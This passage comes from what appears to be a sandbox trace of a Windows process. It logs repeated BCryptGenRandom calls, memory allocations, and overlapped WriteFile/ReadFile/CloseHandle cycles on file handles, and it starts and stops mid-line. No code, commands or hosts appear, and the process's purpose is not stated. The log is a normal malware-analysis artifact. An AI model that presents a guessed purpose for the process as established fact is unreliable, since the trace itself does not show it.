lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.007] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.007] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.007] free (_Block=0x3e305b8) [0204.007] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.007] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.007] free (_Block=0x1fa91d0) [0204.007] free (_Block=0x1fa2ed8) [0204.007] free (_Block=0x1fa90b8) [0204.007] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.008] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.016] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.016] CloseHandle (hObject=0x2a8) returned 1 [0204.017] free (_Block=0x3df0008) [0204.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.023] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.023] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.023] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.023] free (_Block=0x3e305b8) [0204.023] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.023] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.023] free (_Block=0x1fa91d0) [0204.023] free (_Block=0x1fa2ed8) [0204.023] free (_Block=0x1fa90b8) [0204.023] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.024] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.032] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.032] CloseHandle (hObject=0x2a8) returned 1 [0204.032] free (_Block=0x3df0008) [0204.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.037] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.038] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.038] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.038] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.038] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.038] free (_Block=0x3e305b8) [0204.038] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.122] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.164] free (_Block=0x1fa91d0) [0204.164] free (_Block=0x1fa2ed8) [0204.164] free (_Block=0x1fa90b8) [0204.164] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.166] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x96, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.167] CloseHandle (hObject=0x3cc) returned 1 [0204.167] free (_Block=0x1ff1e60) [0204.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.171] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.171] CloseHandle (hObject=0x3cc) returned 1 [0204.171] free (_Block=0x3df0008) [0204.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.184] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.184] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.184] free (_Block=0x3e305b8) [0204.184] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.184] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.184] free (_Block=0x1fa91d0) [0204.184] free (_Block=0x1fa2ed8) [0204.184] free (_Block=0x1fa90b8) [0204.184] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.185] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.193] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x24f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.194] CloseHandle (hObject=0x3cc) returned 1 [0204.194] free (_Block=0x3df0008) [0204.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.202] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.202] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.202] free (_Block=0x3e305b8) [0204.202] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.202] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.202] free (_Block=0x1fa91d0) [0204.202] free (_Block=0x1fa2ed8) [0204.203] free (_Block=0x1fa90b8) [0204.203] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.203] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.212] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.212] CloseHandle (hObject=0x3cc) returned 1 [0204.212] free (_Block=0x3df0008) [0204.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.219] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.219] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.219] free (_Block=0x3e305b8) [0204.219] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.219] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.219] free (_Block=0x1fa91d0) [0204.219] free (_Block=0x1fa2ed8) [0204.219] free (_Block=0x1fa90b8) [0204.219] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.220] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.230] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x45, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.230] CloseHandle (hObject=0x3cc) returned 1 [0204.230] free (_Block=0x3df0008) [0204.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.239] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.239] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.239] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.239] free (_Block=0x3e305b8) [0204.239] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.239] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.240] free (_Block=0x1fa91d0) [0204.240] free (_Block=0x1fa2ed8) [0204.240] free (_Block=0x1fa90b8) [0204.240] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.241] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.253] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.253] CloseHandle (hObject=0x3cc) returned 1 [0204.253] free (_Block=0x3df0008) [0204.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.261] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.262] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.262] free (_Block=0x3e305b8) [0204.262] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.262] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.263] free (_Block=0x1fa91d0) [0204.263] free (_Block=0x1fa2ed8) [0204.263] free (_Block=0x1fa90b8) [0204.263] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.263] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.327] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.327] CloseHandle (hObject=0x3cc) returned 1 [0204.328] free (_Block=0x3df0008) [0204.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.337] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.337] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.337] free (_Block=0x3e305b8) [0204.337] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.337] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.338] free (_Block=0x1fa91d0) [0204.338] free (_Block=0x1fa2ed8) [0204.338] free (_Block=0x1fa90b8) [0204.338] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, 